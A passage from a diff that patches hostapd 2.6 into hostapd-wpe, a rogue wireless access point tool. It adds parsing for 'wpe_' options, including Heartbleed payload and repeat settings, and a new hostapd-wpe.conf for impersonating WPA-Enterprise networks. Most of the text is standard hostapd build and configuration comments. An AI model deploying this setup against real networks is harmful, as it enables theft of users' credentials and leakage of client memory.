server. This provides access to the integrated EAP 858+# server from external hosts using RADIUS. 859+CONFIG_RADIUS_SERVER=y 860+ 861+# Build IPv6 support for RADIUS operations 862+CONFIG_IPV6=y 863+ 864+# IEEE Std 802.11r-2008 (Fast BSS Transition) 865+CONFIG_IEEE80211R=y 866+ 867+# Use the hostapd's IEEE 802.11 authentication (ACL), but without 868+# the IEEE 802.11 Management capability (e.g., FreeBSD/net80211) 869+CONFIG_DRIVER_RADIUS_ACL=y 870+ 871+# IEEE 802.11n (High Throughput) support 872+CONFIG_IEEE80211N=y 873+ 874+# Wireless Network Management (IEEE Std 802.11v-2011) 875+# Note: This is experimental and not complete implementation. 876+CONFIG_WNM=y 877+ 878+# IEEE 802.11ac (Very High Throughput) support 879+CONFIG_IEEE80211AC=y 880+ 881+# Remove debugging code that is printing out debug messages to stdout. 882+# This can be used to reduce the size of the hostapd considerably if debugging 883+# code is not needed. 884+#CONFIG_NO_STDOUT_DEBUG=y 885+ 886+# Add support for writing debug log to a file: -f /tmp/hostapd.log 887+# Disabled by default. 888+#CONFIG_DEBUG_FILE=y 889+ 890+# Add support for sending all debug messages (regardless of debug verbosity) 891+# to the Linux kernel tracing facility. This helps debug the entire stack by 892+# making it easy to record everything happening from the driver up into the 893+# same file, e.g., using trace-cmd. 894+#CONFIG_DEBUG_LINUX_TRACING=y 895+ 896+# Remove support for RADIUS accounting 897+#CONFIG_NO_ACCOUNTING=y 898+ 899+# Remove support for RADIUS 900+#CONFIG_NO_RADIUS=y 901+ 902+# Remove support for VLANs 903+#CONFIG_NO_VLAN=y 904+ 905+# Enable support for fully dynamic VLANs. This enables hostapd to 906+# automatically create bridge and VLAN interfaces if necessary. 907+#CONFIG_FULL_DYNAMIC_VLAN=y 908+ 909+# Use netlink-based kernel API for VLAN operations instead of ioctl() 910+# Note: This requires libnl 3.1 or newer. 911+#CONFIG_VLAN_NETLINK=y 912+ 913+# Remove support for dumping internal state through control interface commands 914+# This can be used to reduce binary size at the cost of disabling a debugging 915+# option. 916+#CONFIG_NO_DUMP_STATE=y 917+ 918+# Enable tracing code for developer debugging 919+# This tracks use of memory allocations and other registrations and reports 920+# incorrect use with a backtrace of call (or allocation) location. 921+#CONFIG_WPA_TRACE=y 922+# For BSD, comment out these. 923+#LIBS += -lexecinfo 924+#LIBS_p += -lexecinfo 925+#LIBS_c += -lexecinfo 926+ 927+# Use libbfd to get more details for developer debugging 928+# This enables use of libbfd to get more detailed symbols for the backtraces 929+# generated by CONFIG_WPA_TRACE=y. 930+#CONFIG_WPA_TRACE_BFD=y 931+# For BSD, comment out these. 932+#LIBS += -lbfd -liberty -lz 933+#LIBS_p += -lbfd -liberty -lz 934+#LIBS_c += -lbfd -liberty -lz 935+ 936+# hostapd depends on strong random number generation being available from the 937+# operating system. os_get_random() function is used to fetch random data when 938+# needed, e.g., for key generation. On Linux and BSD systems, this works by 939+# reading /dev/urandom. It should be noted that the OS entropy pool needs to be 940+# properly initialized before hostapd is started. This is important especially 941+# on embedded devices that do not have a hardware random number generator and 942+# may by default start up with minimal entropy available for random number 943+# generation. 944+# 945+# As a safety net, hostapd is by default trying to internally collect 946+# additional entropy for generating random data to mix in with the data 947+# fetched from the OS. This by itself is not considered to be very strong, but 948+# it may help in cases where the system pool is not initialized properly. 949+# However, it is very strongly recommended that the system pool is initialized 950+# with enough entropy either by using hardware assisted random number 951+# generator or by storing state over device reboots. 952+# 953+# hostapd can be configured to maintain its own entropy store over restarts to 954+# enhance random number generation. This is not perfect, but it is much more 955+# secure than using the same sequence of random numbers after every reboot. 956+# This can be enabled with -e<entropy file> command line option. The specified 957+# file needs to be readable and writable by hostapd. 958+# 959+# If the os_get_random() is known to provide strong random data (e.g., on 960+# Linux/BSD, the board in question is known to have reliable source of random 961+# data from /dev/urandom), the internal hostapd random pool can be disabled. 962+# This will save some in binary size and CPU use. However, this should only be 963+# considered for builds that are known to be used on devices that meet the 964+# requirements described above. 965+#CONFIG_NO_RANDOM_POOL=y 966+ 967+# Should we use poll instead of select? Select is used by default. 968+#CONFIG_ELOOP_POLL=y 969+ 970+# Should we use epoll instead of select? Select is used by default. 971+#CONFIG_ELOOP_EPOLL=y 972+ 973+# Should we use kqueue instead of select? Select is used by default. 974+#CONFIG_ELOOP_KQUEUE=y 975+ 976+# Select TLS implementation 977+# openssl = OpenSSL (default) 978+# gnutls = GnuTLS 979+# internal = Internal TLSv1 implementation (experimental) 980+# none = Empty template 981+#CONFIG_TLS=openssl 982+ 983+# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.1) 984+# can be enabled to get a stronger construction of messages when block ciphers 985+# are used. 986+CONFIG_TLSV11=y 987+ 988+# TLS-based EAP methods require at least TLS v1.0. Newer version of TLS (v1.2) 989+# can be enabled to enable use of stronger crypto algorithms. 990+CONFIG_TLSV12=y 991+ 992+# If CONFIG_TLS=internal is used, additional library and include paths are 993+# needed for LibTomMath. Alternatively, an integrated, minimal version of 994+# LibTomMath can be used. See beginning of libtommath.c for details on benefits 995+# and drawbacks of this option. 996+#CONFIG_INTERNAL_LIBTOMMATH=y 997+#ifndef CONFIG_INTERNAL_LIBTOMMATH 998+#LTM_PATH=/usr/src/libtommath-0.39 999+#CFLAGS += -I$(LTM_PATH) 1000+#LIBS += -L$(LTM_PATH) 1001+#LIBS_p += -L$(LTM_PATH) 1002+#endif 1003+# At the cost of about 4 kB of additional binary size, the internal LibTomMath 1004+# can be configured to include faster routines for exptmod, sqr, and div to 1005+# speed up DH and RSA calculation considerably 1006+CONFIG_INTERNAL_LIBTOMMATH_FAST=y 1007+ 1008+# Interworking (IEEE 802.11u) 1009+# This can be used to enable functionality to improve interworking with 1010+# external networks. 1011+CONFIG_INTERWORKING=y 1012+ 1013+# Hotspot 2.0 1014+CONFIG_HS20=y 1015+ 1016+# Enable SQLite database support in hlr_auc_gw, EAP-SIM DB, and eap_user_file 1017+CONFIG_SQLITE=y 1018+ 1019+# Enable Fast Session Transfer (FST) 1020+CONFIG_FST=y 1021+ 1022+# Enable CLI commands for FST testing 1023+#CONFIG_FST_TEST=y 1024+ 1025+# Testing options 1026+# This can be used to enable some testing options (see also the example 1027+# configuration file) that are really useful only for testing clients that 1028+# connect to this hostapd. These options allow, for example, to drop a 1029+# certain percentage of probe requests or auth/(re)assoc frames. 1030+# 1031+#CONFIG_TESTING_OPTIONS=y 1032+ 1033+# Automatic Channel Selection 1034+# This will allow hostapd to pick the channel automatically when channel is set 1035+# to "acs_survey" or "0". Eventually, other ACS algorithms can be added in 1036+# similar way. 1037+# 1038+# Automatic selection is currently only done through initialization, later on 1039+# we hope to do background checks to keep us moving to more ideal channels as 1040+# time goes by. ACS is currently only supported through the nl80211 driver and 1041+# your driver must have survey dump capability that is filled by the driver 1042+# during scanning. 1043+# 1044+# You can customize the ACS survey algorithm with the hostapd.conf variable 1045+# acs_num_scans. 1046+# 1047+# Supported ACS drivers: 1048+# * ath9k 1049+# * ath5k 1050+# * ath10k 1051+# 1052+# For more details refer to: 1053+# http://wireless.kernel.org/en/users/Documentation/acs 1054+# 1055+CONFIG_ACS=y 1056+ 1057+# Multiband Operation support 1058+# These extentions facilitate efficient use of multiple frequency bands 1059+# available to the AP and the devices that may associate with it. 1060+CONFIG_MBO=y 1061+ 1062+# Client Taxonomy 1063+# Has the AP retain the Probe Request and (Re)Association Request frames from 1064+# a client, from which a signature can be produced which can identify the model 1065+# of client device like "Nexus 6P" or "iPhone 5s". 1066+CONFIG_TAXONOMY=y 1067diff -rupN hostapd-2.6/hostapd/config_file.c hostapd-2.6-wpe/hostapd/config_file.c 1068--- hostapd-2.6/hostapd/config_file.c 2016-10-02 20:51:11.000000000 +0200 1069+++ hostapd-2.6-wpe/hostapd/config_file.c 2018-05-21 11:37:58.859577170 +0200 1070@@ -20,7 +20,7 @@ 1071 #include "ap/wpa_auth.h" 1072 #include "ap/ap_config.h" 1073 #include "config_file.h" 1074- 1075+#include "wpe/wpe.h" 1076 1077 #ifndef CONFIG_NO_RADIUS 1078 #ifdef EAP_SERVER 1079@@ -2108,6 +2108,22 @@ static int hostapd_config_fill(struct ho 1080 return 1; 1081 } 1082 wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version); 1083+#if OPENSSL_VERSION_NUMBER < 0x10100000L 1084+ } else if (os_strcmp(buf, "wpe_logfile") == 0) { 1085+ wpe_conf.wpe_logfile = os_strdup(pos); 1086+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) { 1087+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos); 1088+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) { 1089+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos); 1090+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) { 1091+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos); 1092+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) { 1093+ wpe_conf.wpe_hb_payload_size = atoi(pos); 1094+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) { 1095+ wpe_conf.wpe_hb_num_repeats = atoi(pos); 1096+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) { 1097+ wpe_conf.wpe_hb_num_tries = atoi(pos); 1098+#endif /* #if OPENSSL_VERSION_NUMBER < 0x10100000L */ 1099 #ifdef EAP_SERVER 1100 } else if (os_strcmp(buf, "eap_authenticator") == 0) { 1101 bss->eap_server = atoi(pos); 1102diff -rupN hostapd-2.6/hostapd/defconfig hostapd-2.6-wpe/hostapd/defconfig 1103--- hostapd-2.6/hostapd/defconfig 2016-10-02 20:51:11.000000000 +0200 1104+++ hostapd-2.6-wpe/hostapd/defconfig 2018-05-21 11:37:58.859577170 +0200 1105@@ -148,14 +148,14 @@ CONFIG_IPV6=y 1106 #CONFIG_DRIVER_RADIUS_ACL=y 1107 1108 # IEEE 802.11n (High Throughput) support 1109-#CONFIG_IEEE80211N=y 1110+CONFIG_IEEE80211N=y 1111 1112 # Wireless Network Management (IEEE Std 802.11v-2011) 1113 # Note: This is experimental and not complete implementation. 1114 #CONFIG_WNM=y 1115 1116 # IEEE 802.11ac (Very High Throughput) support 1117-#CONFIG_IEEE80211AC=y 1118+CONFIG_IEEE80211AC=y 1119 1120 # Remove debugging code that is printing out debug messages to stdout. 1121 # This can be used to reduce the size of the hostapd considerably if debugging 1122diff -rupN hostapd-2.6/hostapd/hostapd-wpe.conf hostapd-2.6-wpe/hostapd/hostapd-wpe.conf 1123--- hostapd-2.6/hostapd/hostapd-wpe.conf 1970-01-01 01:00:00.000000000 +0100 1124+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.conf 2018-05-21 11:37:58.859577170 +0200 1125@@ -0,0 +1,2042 @@ 1126+# Configuration file for hostapd-wpe 1127+ 1128+# Interface - Probably wlan0 for 802.11, eth0 for wired 1129+interface=wlan0 1130+ 1131+# May have to change these depending on build location 1132+eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user 1133+ca_cert=/etc/hostapd-wpe/ca.pem 1134+server_cert=/etc/hostapd-wpe/server.pem 1135+private_key=/etc/hostapd-wpe/server.key 1136+private_key_passwd=whatever 1137+dh_file=/etc/hostapd-wpe/dh 1138+ 1139+# 802.11 Options 1140+ssid=hostapd-wpe 1141+channel=1 1142+ 1143+# WPE Options - Dont need to change these to make it all work 1144+# 1145+# wpe_logfile=somefile # (Default: ./hostapd-wpe.log) 1146+# wpe_hb_send_before_handshake=0 # Heartbleed True/False (Default: 1) 1147+# wpe_hb_send_before_appdata=0 # Heartbleed True/False (Default: 0) 1148+# wpe_hb_send_after_appdata=0 # Heartbleed True/False (Default: 0) 1149+# wpe_hb_payload_size=0 # Heartbleed 0-65535 (Default: 50000) 1150+# wpe_hb_num_repeats=0 # Heartbleed 0-65535 (Default: 1) 1151+# wpe_hb_num_tries=0 # Heartbleed 0-65535 (Default: 1) 1152+ 1153+ 1154+# Dont mess with unless you know what you're doing 1155+eap_server=1 1156+eap_fast_a_id=101112131415161718191a1b1c1d1e1f 1157+eap_fast_a_id_info=hostapd-wpe 1158+eap_fast_prov=3 1159+ieee8021x=1 1160+pac_key_lifetime=604800 1161+pac_key_refresh_time=86400 1162+pac_opaque_encr_key=000102030405060708090a0b0c0d0e0f 1163+wpa=2 1164+wpa_key_mgmt=WPA-EAP 1165+wpa_pairwise=CCMP 1166+rsn_pairwise=CCMP 1167+ 1168+############################################################################## 1169+# Everything below this line is pretty much the standard hostapd.conf 1170+############################################################################### 1171+ 1172+##### hostapd configuration file ############################################## 1173+# Empty lines and lines starting with # are ignored 1174+ 1175+# AP netdevice name (without 'ap' postfix, i.e., wlan0 uses wlan0ap for 1176+# management frames with the Host AP driver); wlan0 with many nl80211 drivers 1177+# Note: This attribute can be overridden by the values supplied with the '-i' 1178+# command line parameter. 1179+#interface=wlan0 1180+ 1181+# In case of atheros and nl80211 driver interfaces, an additional 1182+# configuration parameter, bridge, may be used to notify hostapd if the 1183+# interface is included in a bridge. This parameter is not used with Host AP 1184+# driver. If the bridge parameter is not set, the drivers will automatically 1185+# figure out the bridge interface (assuming sysfs is enabled and mounted to 1186+# /sys) and this parameter may not be needed. 1187+# 1188+# For nl80211, this parameter can be used to request the AP interface to be 1189+# added to the bridge automatically (brctl may refuse to do this before hostapd 1190+# has been started to change the interface mode). If needed, the bridge 1191+# interface is also created. 1192+#bridge=br0 1193+ 1194+# Driver interface type (hostap/wired/none/nl80211/bsd); 1195+# default: hostap). nl80211 is used with all Linux mac80211 drivers. 1196+# Use driver=none if building hostapd as a standalone RADIUS server that does 1197+# not control any wireless/wired driver. 1198+# driver=hostap 1199+ 1200+# Driver interface parameters (mainly for development testing use) 1201+# driver_params=<params> 1202+ 1203+# hostapd event logger configuration 1204+# 1205+# Two output method: syslog and stdout (only usable if not forking to 1206+# background). 1207+# 1208+# Module bitfield (ORed bitfield of modules that will be logged; -1 = all 1209+# modules): 1210+# bit 0 (1) = IEEE 802.11 1211+# bit 1 (2) = IEEE 802.1X 1212+# bit 2 (4) = RADIUS 1213+# bit 3 (8) = WPA 1214+# bit 4 (16) = driver interface 1215+# bit 5 (32) = IAPP 1216+# bit 6 (64) = MLME 1217+# 1218+# Levels (minimum value for logged events): 1219+# 0 = verbose debugging 1220+# 1 = debugging 1221+# 2 = informational messages 1222+# 3 = notification 1223+# 4 = warning 1224+# 1225+logger_syslog=-1 1226+logger_syslog_level=2 1227+logger_stdout=-1 1228+logger_stdout_level=2 1229+ 1230+# Interface for separate control program. If this is specified, hostapd 1231+# will create this directory and a UNIX domain socket for listening to requests 1232+# from external programs (CLI/GUI, etc.) for status information and 1233+# configuration. The socket file will be named based on the interface name, so 1234+# multiple hostapd processes/interfaces can be run at the same time if more 1235+# than one interface is used. 1236+# /var/run/hostapd is the recommended directory for sockets and by default, 1237+# hostapd_cli will use it when trying to connect with hostapd. 1238+ctrl_interface=/var/run/hostapd 1239+ 1240+# Access control for the control interface can be configured by setting the 1241+# directory to allow only members of a group to use sockets. This way, it is 1242+# possible to run hostapd as root (since it needs to change network 1243+# configuration and open raw sockets) and still allow GUI/CLI components to be 1244+# run as non-root users. However, since the control interface can be used to 1245+# change the network configuration, this access needs to be protected in many 1246+# cases. By default, hostapd is configured to use gid 0 (root). If you 1247+# want to allow non-root users to use the contron interface, add a new group 1248+# and change this value to match with that group. Add users that should have 1249+# control interface access to this group. 1250+# 1251+# This variable can be a group name or gid. 1252+#ctrl_interface_group=wheel 1253+ctrl_interface_group=0 1254+ 1255+ 1256+##### IEEE 802.11 related configuration ####################################### 1257+ 1258+# SSID to be used in IEEE 802.11 management frames 1259+#ssid=test 1260+# Alternative formats for configuring SSID 1261+# (double quoted string, hexdump, printf-escaped string) 1262+#ssid2="test" 1263+#ssid2=74657374 1264+#ssid2=P"hello\nthere" 1265+ 1266+# UTF-8 SSID: Whether the SSID is to be interpreted using UTF-8 encoding 1267+#utf8_ssid=1 1268+ 1269+# Country code (ISO/IEC 3166-1). Used to set regulatory domain. 1270+# Set as needed to indicate country in which device is operating. 1271+# This can limit available channels and transmit power. 1272+#country_code=US 1273+ 1274+# Enable IEEE 802.11d. This advertises the country_code and the set of allowed 1275+# channels and transmit power levels based on the regulatory limits. The 1276+# country_code setting must be configured with the correct country for 1277+# IEEE 802.11d functions. 1278+# (default: 0 = disabled) 1279+#ieee80211d=1 1280+ 1281+# Enable IEEE 802.11h. This enables radar detection and DFS support if 1282+# available. DFS support is required on outdoor 5 GHz channels in most countries 1283+# of the world. This can be used only with ieee80211d=1. 1284+# (default: 0 = disabled) 1285+#ieee80211h=1 1286+ 1287+# Add Power Constraint element to Beacon and Probe Response frames 1288+# This config option adds Power Constraint element when applicable and Country 1289+# element is added. Power Constraint element is required by Transmit Power 1290+# Control. This can be used only with ieee80211d=1. 1291+# Valid values are 0..255. 1292+#local_pwr_constraint=3 1293+ 1294+# Set Spectrum Management subfield in the Capability Information field. 1295+# This config option forces the Spectrum Management bit to be set. When this 1296+# option is not set, the value of the Spectrum Management bit depends on whether 1297+# DFS or TPC is required by regulatory authorities. This can be used only with 1298+# ieee80211d=1 and local_pwr_constraint configured. 1299+#spectrum_mgmt_required=1 1300+ 1301+# Operation mode (a = IEEE 802.11a (5 GHz), b = IEEE 802.11b (2.4 GHz), 1302+# g = IEEE 802.11g (2.4 GHz), ad = IEEE 802.11ad (60 GHz); a/g options are used 1303+# with IEEE 802.11n (HT), too, to specify band). For IEEE 802.11ac (VHT), this 1304+# needs to be set to hw_mode=a. When using ACS (see channel parameter), a 1305+# special value "any" can be used to indicate that any support band can be used. 1306+# This special case is currently supported only with drivers with which 1307+# offloaded ACS is used. 1308+# Default: IEEE 802.11b 1309+hw_mode=g 1310+ 1311+# Channel number (IEEE 802.11) 1312+# (default: 0, i.e., not set) 1313+# Please note that some drivers do not use this value from hostapd and the 1314+# channel will need to be configured separately with iwconfig. 1315+# 1316+# If CONFIG_ACS build option is enabled, the channel can be selected 1317+# automatically at run time by setting channel=acs_survey or channel=0, both of 1318+# which will enable the ACS survey based algorithm. 1319+#channel=1 1320+ 1321+# ACS tuning - Automatic Channel Selection 1322+# See: http://wireless.kernel.org/en/users/Documentation/acs 1323+# 1324+# You can customize the ACS survey algorithm with following variables: 1325+# 1326+# acs_num_scans requirement is 1..100 - number of scans to be performed that 1327+# are used to trigger survey data gathering of an underlying device driver. 1328+# Scans are passive and typically take a little over 100ms (depending on the 1329+# driver) on each available channel for given hw_mode. Increasing this value 1330+# means sacrificing startup time and gathering more data wrt channel 1331+# interference that may help choosing a better channel. This can also help fine 1332+# tune the ACS scan time in case a driver has different scan dwell times. 1333+# 1334+# acs_chan_bias is a space-separated list of <channel>:<bias> pairs. It can be 1335+# used to increase (or decrease) the likelihood of a specific channel to be 1336+# selected by the ACS algorithm. The total interference factor for each channel 1337+# gets multiplied by the specified bias value before finding the channel with 1338+# the lowest value. In other words, values between 0.0 and 1.0 can be used to 1339+# make a channel more likely to be picked while values larger than 1.0 make the 1340+# specified channel less likely to be picked. This can be used, e.g., to prefer 1341+# the commonly used 2.4 GHz band channels 1, 6, and 11 (which is the default 1342+# behavior on 2.4 GHz band if no acs_chan_bias parameter is specified). 1343+# 1344+# Defaults: 1345+#acs_num_scans=5 1346+#acs_chan_bias=1:0.8 6:0.8 11:0.8 1347+ 1348+# Channel list restriction. This option allows hostapd to select one of the 1349+# provided channels when a channel should be automatically selected. 1350+# Channel list can be provided as range using hyphen ('-') or individual 1351+# channels can be specified by space (' ') separated values 1352+# Default: all channels allowed in selected hw_mode 1353+#chanlist=100 104 108 112 116 1354+#chanlist=1 6 11-13 1355+ 1356+# Beacon interval in kus (1.024 ms) (default: 100; range 15..65535) 1357+beacon_int=100 1358+ 1359+# DTIM (delivery traffic information message) period (range 1..255): 1360+# number of beacons between DTIMs (1 = every beacon includes DTIM element) 1361+# (default: 2) 1362+dtim_period=2 1363+ 1364+# Maximum number of stations allowed in station table. New stations will be 1365+# rejected after the station table is full. IEEE 802.11 has a limit of 2007 1366+# different association IDs, so this number should not be larger than that. 1367+# (default: 2007) 1368+max_num_sta=255 1369+ 1370+# RTS/CTS threshold; -1 = disabled (default); range -1..65535 1371+# If this field is not included in hostapd.conf, hostapd will not control 1372+# RTS threshold and 'iwconfig wlan# rts <val>' can be used to set it. 1373+rts_threshold=-1 1374+ 1375+# Fragmentation threshold; -1 = disabled (default); range -1, 256..2346 1376+# If this field is not included in hostapd.conf, hostapd will not control 1377+# fragmentation threshold and 'iwconfig wlan# frag <val>' can be used to set 1378+# it. 1379+fragm_threshold=-1 1380+ 1381+# Rate configuration 1382+# Default is to enable all rates supported by the hardware. This configuration 1383+# item allows this list be filtered so that only the listed rates will be left 1384+# in the list. If the list is empty, all rates are used. This list can have 1385+# entries that are not in the list of rates the hardware supports (such entries 1386+# are ignored). The entries in this list are in 100 kbps, i.e., 11 Mbps = 110. 1387+# If this item is present, at least one rate have to be matching with the rates 1388+# hardware supports. 1389+# default: use the most common supported rate setting for the selected 1390+# hw_mode (i.e., this line can be removed from configuration file in most 1391+# cases) 1392+#supported_rates=10 20 55 110 60 90 120 180 240 360 480 540 1393+ 1394+# Basic rate set configuration 1395+# List of rates (in 100 kbps) that are included in the basic rate set. 1396+# If this item is not included, usually reasonable default set is used. 1397+#basic_rates=10 20 1398+#basic_rates=10 20 55 110 1399+#basic_rates=60 120 240 1400+ 1401+# Short Preamble 1402+# This parameter can be used to enable optional use of short preamble for 1403+# frames sent at 2 Mbps, 5.5 Mbps, and 11 Mbps to improve network performance. 1404+# This applies only to IEEE 802.11b-compatible networks and this should only be 1405+# enabled if the local hardware supports use of short preamble. If any of the 1406+# associated STAs do not support short preamble, use of short preamble will be 1407+# disabled (and enabled when such STAs disassociate) dynamically. 1408+# 0 = do not allow use of short preamble (default) 1409+# 1 = allow use of short preamble 1410+#preamble=1 1411+ 1412+# Station MAC address -based authentication 1413+# Please note that this kind of access control requires a driver that uses 1414+# hostapd to take care of management frame processing and as such, this can be 1415+# used with driver=hostap or driver=nl80211, but not with driver=atheros. 1416+# 0 = accept unless in deny list 1417+# 1 = deny unless in accept list 1418+# 2 = use external RADIUS server (accept/deny lists are searched first) 1419+macaddr_acl=0 1420+ 1421+# Accept/deny lists are read from separate files (containing list of 1422+# MAC addresses, one per line). Use absolute path name to make sure that the 1423+# files can be read on SIGHUP configuration reloads. 1424+#accept_mac_file=/etc/hostapd.accept 1425+#deny_mac_file=/etc/hostapd.deny 1426+ 1427+# IEEE 802.11 specifies two authentication algorithms. hostapd can be 1428+# configured to allow both of these or only one. Open system authentication 1429+# should be used with IEEE 802.1X. 1430+# Bit fields of allowed authentication algorithms: 1431+# bit 0 = Open System Authentication 1432+# bit 1 = Shared Key Authentication (requires WEP) 1433+auth_algs=3 1434+ 1435+# Send empty SSID in beacons and ignore probe request frames that do not 1436+# specify full SSID, i.e., require stations to know SSID. 1437+# default: disabled (0) 1438+# 1 = send empty (length=0) SSID in beacon and ignore probe request for 1439+# broadcast SSID 1440+# 2 = clear SSID (ASCII 0), but keep the original length (this may be required 1441+# with some clients that do not support empty SSID) and ignore probe 1442+# requests for broadcast SSID 1443+ignore_broadcast_ssid=0 1444+ 1445+# Do not reply to broadcast Probe Request frames from unassociated STA if there 1446+# is no room for additional stations (max_num_sta). This can be used to 1447+# discourage a STA from trying to associate with this AP if the association 1448+# would be rejected due to maximum STA limit. 1449+# Default: 0 (disabled) 1450+#no_probe_resp_if_max_sta=0 1451+ 1452+# Additional vendor specific elements for Beacon and Probe Response frames 1453+# This parameter can be used to add additional vendor specific element(s) into 1454+# the end of the Beacon and Probe Response frames. The format for these 1455+# element(s) is a hexdump of the raw information elements (id+len+payload for 1456+# one or more elements) 1457+#vendor_elements=dd0411223301 1458+ 1459+# Additional vendor specific elements for (Re)Association Response frames 1460+# This parameter can be used to add additional vendor specific element(s) into 1461+# the end of the (Re)Association Response frames. The format for these 1462+# element(s) is a hexdump of the raw information elements (id+len+payload for 1463+# one or more elements) 1464+#assocresp_elements=dd0411223301 1465+ 1466+# TX queue parameters (EDCF / bursting) 1467+# tx_queue_<queue name>_<param> 1468+# queues: data0, data1, data2, data3, after_beacon, beacon 1469+# (data0 is the highest priority queue) 1470+# parameters: 1471+# aifs: AIFS (default 2) 1472+# cwmin: cwMin (1, 3, 7, 15, 31, 63, 127, 255, 511, 1023, 2047, 4095, 8191, 1473+# 16383, 32767) 1474+# cwmax: cwMax (same values as cwMin, cwMax >= cwMin) 1475+# burst: maximum length (in milliseconds with precision of up to 0.1 ms) for 1476+# bursting 1477+# 1478+# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): 1479+# These parameters are used by the access point when transmitting frames 1480+# to the clients. 1481+# 1482+# Low priority / AC_BK = background 1483+#tx_queue_data3_aifs=7 1484+#tx_queue_data3_cwmin=15 1485+#tx_queue_data3_cwmax=1023 1486+#tx_queue_data3_burst=0 1487+# Note: for IEEE 802.11b mode: cWmin=31 cWmax=1023 burst=0 1488+# 1489+# Normal priority / AC_BE = best effort 1490+#tx_queue_data2_aifs=3 1491+#tx_queue_data2_cwmin=15 1492+#tx_queue_data2_cwmax=63 1493+#tx_queue_data2_burst=0 1494+# Note: for IEEE 802.11b mode: cWmin=31 cWmax=127 burst=0 1495+# 1496+# High priority / AC_VI = video 1497+#tx_queue_data1_aifs=1 1498+#tx_queue_data1_cwmin=7 1499+#tx_queue_data1_cwmax=15 1500+#tx_queue_data1_burst=3.0 1501+# Note: for IEEE 802.11b mode: cWmin=15 cWmax=31 burst=6.0 1502+# 1503+# Highest priority / AC_VO = voice 1504+#tx_queue_data0_aifs=1 1505+#tx_queue_data0_cwmin=3 1506+#tx_queue_data0_cwmax=7 1507+#tx_queue_data0_burst=1.5 1508+# Note: for IEEE 802.11b mode: cWmin=7 cWmax=15 burst=3.3 1509+ 1510+# 802.1D Tag (= UP) to AC mappings 1511+# WMM specifies following mapping of data frames to different ACs. This mapping 1512+# can be configured using Linux QoS/tc and sch_pktpri.o module. 1513+# 802.1D Tag 802.1D Designation Access Category WMM Designation 1514+# 1 BK AC_BK Background 1515+# 2 - AC_BK Background 1516+# 0 BE AC_BE Best Effort 1517+# 3 EE AC_BE Best Effort 1518+# 4 CL AC_VI Video 1519+# 5 VI AC_VI Video 1520+# 6 VO AC_VO Voice 1521+# 7 NC AC_VO Voice 1522+# Data frames with no priority information: AC_BE 1523+# Management frames: AC_VO 1524+# PS-Poll frames: AC_BE 1525+ 1526+# Default WMM parameters (IEEE 802.11 draft; 11-03-0504-03-000e): 1527+# for 802.11a or 802.11g networks 1528+# These parameters are sent to WMM clients when they associate. 1529+# The parameters will be used by WMM clients for frames transmitted to the 1530+# access point. 1531+# 1532+# note - txop_limit is in units of 32microseconds 1533+# note - acm is admission control mandatory flag. 0 = admission control not 1534+# required, 1 = mandatory 1535+# note - Here cwMin and cmMax are in exponent form. The actual cw value used 1536+# will be (2^n)-1 where n is the value given here. The allowed range for these 1537+# wmm_ac_??_{cwmin,cwmax} is 0..15 with cwmax >= cwmin. 1538+# 1539+wmm_enabled=1 1540+# 1541+# WMM-PS Unscheduled Automatic Power Save Delivery [U-APSD] 1542+# Enable this flag if U-APSD supported outside hostapd (eg., Firmware/driver) 1543+#uapsd_advertisement_enabled=1 1544+# 1545+# Low priority / AC_BK = background 1546+wmm_ac_bk_cwmin=4 1547+wmm_ac_bk_cwmax=10 1548+wmm_ac_bk_aifs=7 1549+wmm_ac_bk_txop_limit=0 1550+wmm_ac_bk_acm=0 1551+# Note: for IEEE 802.11b mode: cWmin=5 cWmax=10 1552+# 1553+# Normal priority / AC_BE = best effort 1554+wmm_ac_be_aifs=3 1555+wmm_ac_be_cwmin=4 1556+wmm_ac_be_cwmax=10 1557+wmm_ac_be_txop_limit=0 1558+wmm_ac_be_acm=0 1559+# Note: for IEEE 802.11b mode: cWmin=5 cWmax=7 1560+# 1561+# High priority / AC_VI = video 1562+wmm_ac_vi_aifs=2 1563+wmm_ac_vi_cwmin=3 1564+wmm_ac_vi_cwmax=4 1565+wmm_ac_vi_txop_limit=94 1566+wmm_ac_vi_acm=0 1567+# Note: for IEEE 802.11b mode: cWmin=4 cWmax=5 txop_limit=188 1568+# 1569+# Highest priority / AC_VO = voice 1570+wmm_ac_vo_aifs=2 1571+wmm_ac_vo_cwmin=2 1572+wmm_ac_vo_cwmax=3 1573+wmm_ac_vo_txop_limit=47 1574+wmm_ac_vo_acm=0 1575+# Note: for IEEE 802.11b mode: cWmin=3 cWmax=4 burst=102 1576+ 1577+# Static WEP key configuration 1578+# 1579+# The key number to use when transmitting. 1580+# It must be between 0 and 3, and the corresponding key must be set. 1581+# default: not set 1582+#wep_default_key=0 1583+# The WEP keys to use. 1584+# A key may be a quoted string or unquoted hexadecimal digits. 1585+# The key length should be 5, 13, or 16 characters, or 10, 26, or 32 1586+# digits, depending on whether 40-bit (64-bit), 104-bit (128-bit), or 1587+# 128-bit (152-bit) WEP is used. 1588+# Only the default key must be supplied; the others are optional. 1589+# default: not set 1590+#wep_key0=123456789a 1591+#wep_key1="vwxyz" 1592+#wep_key2=0102030405060708090a0b0c0d 1593+#wep_key3=".2.4.6.8.0.23" 1594+ 1595+# Station inactivity limit 1596+# 1597+# If a station does not send anything in ap_max_inactivity seconds, an 1598+# empty data frame is sent to it in order to verify whether it is 1599+# still in range. If this frame is not ACKed, the station will be 1600+# disassociated and then deauthenticated. This feature is used to 1601+# clear station table of old entries when the STAs move out of the 1602+# range. 1603+# 1604+# The station can associate again with the AP if it is still in range; 1605+# this inactivity poll is just used as a nicer way of verifying 1606+# inactivity; i.e., client will not report broken connection because 1607+# disassociation frame is not sent immediately without first polling 1608+# the STA with a data frame. 